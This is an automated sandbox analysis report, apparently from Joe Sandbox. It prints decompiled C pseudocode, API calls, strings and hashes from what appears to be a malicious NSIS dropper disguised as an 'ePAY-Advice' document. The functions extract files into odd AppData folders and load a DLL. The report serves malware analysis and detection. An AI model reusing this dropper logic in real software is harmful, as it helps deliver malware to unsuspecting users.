String ID: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Provokations.Fje$Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-925533201
Opcode ID: fabf967f770454fcc69e8c0a52ac2f68008736219b33d49b2524f3e131f746b9
Instruction ID: 60a0f59e8b6b1cd7b12ffa89f816090d794fd0a29963f433d7893304f5ec962b
Opcode Fuzzy Hash: fabf967f770454fcc69e8c0a52ac2f68008736219b33d49b2524f3e131f746b9
Instruction Fuzzy Hash: 9D61F171A00111AEDF219F24CC95BBB3BA5DB45300F16813BE943BA2D2C23C49A2CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401759 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402ACB(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E0040596F(_t82);
				_push(_t82);
				_t83 = "Call";
				if(_t33 == 0) {
					lstrcatA(E00405902(E00405F6A(_t83, "C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr\\Rekapitulerer\\Inseminerede79")), ??);
				} else {
					E00405F6A();
				}
				E004061D4(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E0040626D(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405ADE(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405B03(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00405091(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x4237a8;
						goto L32;
					} else {
						E00405F6A(0x409be8, "C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr\\Provokations.Fje");
						E00405F6A("C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr\\Provokations.Fje", _t83);
						E00405F8C(_t75, 0x409be8, _t83, "C:\Users\alfons\AppData\Local\Temp\nslD140.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405F6A("C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr\\Provokations.Fje", 0x409be8);
						_t62 = E00405686("C:\Users\alfons\AppData\Local\Temp\nslD140.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x4237a8 =  &( *0x4237a8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E00405091();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00405091(0xffffffea,  *(_t85 - 8));
				 *0x4237d4 =  *0x4237d4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0xc));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E00402F9C(); // executed
				 *0x4237d4 =  *0x4237d4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405F8C(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E00405F8C(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405686();
					goto L29;
				}
				goto L33;
			}

0x00401759
0x00401760
0x00401769
0x0040176c
0x0040176f
0x00401774
0x00401775
0x0040177c
0x00401798
0x0040177e
0x0040177f
0x0040177f
0x0040179e
0x004017a8
0x004017a8
0x004017ac
0x004017af
0x004017b4
0x004017b6
0x004017b8
0x004017bd
0x004017bd
0x004017c8
0x004017c8
0x004017d9
0x004017db
0x004017db
0x004017dc
0x004017dc
0x004017df
0x004017e2
0x004017e5
0x004017e5
0x004017ec
0x004017fb
0x00401800
0x00401803
0x00401806
0x00000000
0x00000000
0x00401808
0x0040180b
0x00401865
0x0040186a
0x004015b0
0x0040271c
0x0040271c
0x00402957
0x0040295a
0x0040295a
0x00000000
0x0040180d
0x00401813
0x0040181e
0x0040182b
0x00401836
0x0040184c
0x0040184c
0x0040184f
0x00000000
0x00401855
0x00401855
0x00401856
0x00401873
0x00402960
0x00402960
0x00402960
0x00401858
0x00401858
0x00401859
0x00401492
0x004022e7
0x004022e7
0x004022e7
0x00401856
0x0040184f
0x00402962
0x00402966
0x00402966
0x00401883
0x00401888
0x0040188e
0x0040188f
0x00401890
0x00401893
0x00401896
0x0040189b
0x004018a1
0x004018a5
0x004018a7
0x004018af
0x004018bb
0x004018a9
0x004018a9
0x004018ad
0x00000000
0x00000000
0x004018ad
0x004018c4
0x004018ca
0x004018cc
0x00000000
0x004018d2
0x004018d2
0x004018d5
0x004018ed
0x004018d7
0x004018da
0x004018e3
0x004018e3
0x004018f2
0x004018f7
0x004022e2
0x00000000
0x004022e2
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405F6A: lstrcpynA.KERNEL32(?,?,00000400,004032A8,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F77

Part of subcall function 00405091: lstrlenA.KERNEL32(0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000,?), ref: 004050CA
Part of subcall function 00405091: lstrlenA.KERNEL32(004030CC,0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000), ref: 004050DA
Part of subcall function 00405091: lstrcatA.KERNEL32(0041F4E8,004030CC,004030CC,0041F4E8,00000000,0040E8C0,00000000), ref: 004050ED
Part of subcall function 00405091: SetWindowTextA.USER32(0041F4E8,0041F4E8), ref: 004050FF
Part of subcall function 00405091: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405125
Part of subcall function 00405091: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513F
Part of subcall function 00405091: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040514D

Strings

C:\Users\user\AppData\Local\Temp\nslD140.tmp\System.dll, xrefs: 00401826, 00401842
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79, xrefs: 00401786
C:\Users\user\AppData\Local\Temp\nslD140.tmp, xrefs: 004017A3, 00401812, 00401830
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Provokations.Fje, xrefs: 0040180D, 00401819, 00401831
Call, xrefs: 00401775, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nslD140.tmp$C:\Users\user\AppData\Local\Temp\nslD140.tmp\System.dll$C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Provokations.Fje$C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79$Call
API String ID: 1941528284-1363743449
Opcode ID: 0ba3ac73ae7538b2b02d11bb689106fdc4bdf0c23ea3870a99183fde85735efe
Instruction ID: ccd8e90e53bd547ce555faf0a88c0b4db7f619f01c1663a473e2e99c851a8e73
Opcode Fuzzy Hash: 0ba3ac73ae7538b2b02d11bb689106fdc4bdf0c23ea3870a99183fde85735efe
Instruction Fuzzy Hash: D841A571A04516BECF107BB5CC45DAF76A8EF45369B20823BF521F20E1C77C8A418A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405557 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405557(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x407374;
				_v36.Group = 0x407374;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x407364;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405562
0x00405566
0x00405569
0x0040556f
0x00405573
0x00405577
0x0040557f
0x00405586
0x0040558c
0x00405593
0x0040559a
0x004055a2
0x004055a4
0x00000000
0x004055a4
0x004055ae
0x004055b5
0x004055cb
0x00000000
0x00000000
0x00000000
0x004055cd
0x004055d1

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040559A
GetLastError.KERNEL32 ref: 004055AE
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055C3
GetLastError.KERNEL32 ref: 004055CD

Strings

ds@, xrefs: 0040558C
C:\Users\user\Desktop, xrefs: 00405557
C:\Users\user\AppData\Local\Temp\, xrefs: 0040557D
ts@, xrefs: 0040555D

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
API String ID: 3449924974-891493705
Opcode ID: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
Instruction ID: 3d8c07b43999b23b4b99d6b0442eda675a509ebc6c38f8f9f8ea4228a2b68225
Opcode Fuzzy Hash: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
Instruction Fuzzy Hash: 0D010871C04259EAEF019BA1CC447EFBFB9EF04354F10817AD905B6290E378A604CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00406294 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406294(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x004062ab
0x004062b4
0x004062b6
0x004062b6
0x004062ba
0x004062cc
0x004062c6
0x004062c6
0x004062c6
0x004062d0
0x004062e4
0x004062f8
0x004062ff

APIs

GetSystemDirectoryA.KERNEL32 ref: 004062AB
wsprintfA.USER32 ref: 004062E4
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F8

Strings

%s%s.dll, xrefs: 004062DE
UXTHEME, xrefs: 0040629D
\, xrefs: 004062BC

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
Instruction ID: b350a7b34e5dfe1d1a07fade029f1484d0e2916aa38c44d12689a48c44b66a33
Opcode Fuzzy Hash: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
Instruction Fuzzy Hash: FAF0F63091410AAADF15AB74DC0DFFB365CAB08304F1405BAB646E11D2E6B8E9288B69

Uniqueness

Uniqueness Score: -1.00%

Function 00402F9C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00402F9C(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				char _v84;
				void* _t59;
				void* _t61;
				intOrPtr _t69;
				long _t70;
				void* _t71;
				intOrPtr _t81;
				intOrPtr _t86;
				long _t89;
				signed int _t90;
				int _t91;
				int _t92;
				intOrPtr _t93;
				void* _t94;
				void* _t95;

				_t90 = _a16;
				_t86 = _a12;
				_v12 = _t90;
				if(_t86 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t81 = _t86;
				if(_t86 == 0) {
					_t81 = 0x40e8c0;
				}
				_t56 = _a4;
				if(_a4 >= 0) {
					E0040318E( *0x423778 + _t56);
				}
				if(E00403178( &_a16, 4) == 0) {
					L33:
					_push(0xfffffffd);
					goto L34;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t86 == 0) {
							while(_a16 > 0) {
								_t91 = _v12;
								if(_a16 < _t91) {
									_t91 = _a16;
								}
								if(E00403178(0x40a8c0, _t91) == 0) {
									goto L33;
								} else {
									_t61 = E00405BAA(_a8, 0x40a8c0, _t91); // executed
									if(_t61 == 0) {
										L28:
										_push(0xfffffffe);
										L34:
										_pop(_t59);
										return _t59;
									}
									_v8 = _v8 + _t91;
									_a16 = _a16 - _t91;
									continue;
								}
							}
							L43:
							return _v8;
						}
						if(_a16 < _t90) {
							_t90 = _a16;
						}
						if(E00403178(_t86, _t90) != 0) {
							_v8 = _t90;
							goto L43;
						} else {
							goto L33;
						}
					}
					_v16 = GetTickCount();
					E00406427(0x40a830);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L43;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t92 = 0x4000;
						if(_a16 < 0x4000) {
							_t92 = _a16;
						}
						if(E00403178(0x40a8c0, _t92) == 0) {
							goto L33;
						}
						_a16 = _a16 - _t92;
						 *0x40a848 = 0x40a8c0;
						 *0x40a84c = _t92;
						while(1) {
							 *0x40a850 = _t81;
							 *0x40a854 = _v12; // executed
							_t69 = E00406447(0x40a830); // executed
							_v20 = _t69;
							if(_t69 < 0) {
								break;
							}
							_t93 =  *0x40a850; // 0x40e8c0
							_t94 = _t93 - _t81;
							_t70 = GetTickCount();
							_t89 = _t70;
							if(( *0x4237d4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v84, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t95 = _t95 + 0xc;
								E00405091(0,  &_v84);
								_v16 = _t89;
							}
							if(_t94 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L43;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t94;
									_v12 = _v12 - _t94;
									_t81 =  *0x40a850; // 0x40e8c0
									L23:
									if(_v20 != 1) {
										continue;
									}
									goto L43;
								}
								_t71 = E00405BAA(_a8, _t81, _t94); // executed
								if(_t71 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t94;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L34;
					}
					goto L33;
				}
			}

0x00402fa4
0x00402fa8
0x00402fab
0x00402fb0
0x00402fb2
0x00402fb2
0x00402fb9
0x00402fbd
0x00402fc1
0x00402fc3
0x00402fc3
0x00402fc8
0x00402fcd
0x00402fd8
0x00402fd8
0x00402fea
0x0040312f
0x0040312f
0x00000000
0x00402ff0
0x00402ff4
0x0040311a
0x00403163
0x00403134
0x0040313a
0x0040313c
0x0040313c
0x0040314d
0x00000000
0x0040314f
0x00403154
0x0040315b
0x00403114
0x00403114
0x00403131
0x00403131
0x00000000
0x00403131
0x0040315d
0x00403160
0x00000000
0x00403160
0x0040314d
0x0040316e
0x00000000
0x0040316e
0x0040311f
0x00403121
0x00403121
0x0040312d
0x0040316b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040312d
0x00403005
0x00403008
0x0040300d
0x0040300d
0x00403017
0x0040301a
0x00000000
0x00000000
0x00000000
0x00000000
0x00403020
0x00403020
0x00403020
0x00403028
0x0040302a
0x0040302a
0x0040303b
0x00000000
0x00000000
0x00403041
0x00403044
0x0040304a
0x00403050
0x00403058
0x0040305e
0x00403063
0x0040306a
0x0040306d
0x00000000
0x00000000
0x00403073
0x00403079
0x0040307b
0x00403088
0x0040308a
0x004030b8
0x004030be
0x004030c7
0x004030cc
0x004030cc
0x004030d1
0x00403108
0x00000000
0x00000000
0x00000000
0x004030d3
0x004030d7
0x004030ec
0x004030ef
0x004030f2
0x004030f8
0x004030fc
0x00000000
0x00000000
0x00000000
0x00403102
0x004030de
0x004030e5
0x00000000
0x00000000
0x004030e7
0x00000000
0x004030e7
0x004030d1
0x00403110
0x00000000
0x00403110
0x00000000
0x00403020

APIs

GetTickCount.KERNEL32 ref: 00402FFA
GetTickCount.KERNEL32 ref: 0040307B
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 004030A8
wsprintfA.USER32 ref: 004030B8

Strings

... %d%%, xrefs: 004030B2

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 1fd27a76b4cfc9f99989baa1e417c1091a8e19b6c8bbbe4dda6a34e9ab433526
Instruction ID: 5f1f0f90ab52480f624b15d228fda7616e1eaa7d5f1d5864c66c4d16daa58cb3
Opcode Fuzzy Hash: 1fd27a76b4cfc9f99989baa1e417c1091a8e19b6c8bbbe4dda6a34e9ab433526
Instruction Fuzzy Hash: 69518271901219ABCF10DF65DA4469F7BB8AB08756F14413BF910BB2C0C7389E51CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402003 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E00402003(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x4237d8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x4237a8 =  *0x4237a8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402ACB(0xfffffff0);
				 *(_t34 + 8) = E00402ACB(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00405091(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, "C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr\\Provokations.Fje", 0x40a828, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403738(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00402003
0x00402003
0x00402008
0x0040200f
0x004020ca
0x0040223d
0x0040223d
0x00402957
0x0040295a
0x00402966
0x00402966
0x0040201e
0x00402028
0x0040202b
0x0040203a
0x0040203e
0x00402044
0x00402048
0x004020c3
0x00000000
0x004020c3
0x0040204a
0x00402053
0x00402057
0x0040209b
0x00402059
0x0040205c
0x0040205f
0x0040208f
0x00402061
0x00402064
0x0040206d
0x0040206f
0x0040206f
0x0040206d
0x0040205f
0x004020a3
0x004020b8
0x004020b8
0x00000000
0x004020a3
0x0040202e
0x00402034
0x00402038
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040202E

Part of subcall function 00405091: lstrlenA.KERNEL32(0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000,?), ref: 004050CA
Part of subcall function 00405091: lstrlenA.KERNEL32(004030CC,0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000), ref: 004050DA
Part of subcall function 00405091: lstrcatA.KERNEL32(0041F4E8,004030CC,004030CC,0041F4E8,00000000,0040E8C0,00000000), ref: 004050ED
Part of subcall function 00405091: SetWindowTextA.USER32(0041F4E8,0041F4E8), ref: 004050FF
Part of subcall function 00405091: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405125
Part of subcall function 00405091: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513F
Part of subcall function 00405091: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040514D

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040203E
GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8

Strings

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Provokations.Fje, xrefs: 00402082

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
